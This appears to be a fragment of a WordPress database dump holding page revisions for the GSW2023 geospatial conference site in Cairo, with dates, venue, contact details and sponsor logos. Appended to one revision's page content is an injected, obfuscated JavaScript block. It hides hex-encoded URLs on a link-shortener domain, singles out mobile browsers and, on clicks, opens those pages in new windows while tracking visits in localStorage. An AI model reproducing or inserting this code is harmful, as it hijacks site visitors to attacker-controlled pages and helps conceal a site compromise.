src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:28:19','2023-08-15 23:28:19','',3066,'https://gsw2023.com/?p=5222',0,'revision','',0),
(5223,1,'2023-08-15 23:29:02','2023-08-15 23:29:02','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner]\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text 